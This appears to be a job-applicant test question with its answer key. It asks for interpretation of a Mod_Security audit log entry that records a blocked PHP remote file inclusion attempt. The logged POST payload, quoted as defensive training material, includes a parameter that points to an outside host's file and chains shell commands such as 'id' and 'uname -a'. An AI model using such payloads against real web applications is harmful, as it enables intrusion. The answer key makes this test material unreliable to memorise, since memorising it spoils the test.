What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

========================================

Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743

Handler: cgi-script

----------------------------------------

POST /index.php HTTP/1.1

Host: www.foo.com

Connection: keep-alive

Accept: */*

Accept-Language: en-us

Content-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla 4.0 (Linux)

Content-Length: 65

X-Forwarded-For: 200.158.8.207

mod_security-message: Access denied with code 403. Pattern match "unamex20-a" at POST_PAYLOAD

mod_security-action: 403

65

lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

----------------------------------------

Note: Goal of question – to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:

· The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname –a" data in the POST PAYLOAD.

· The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.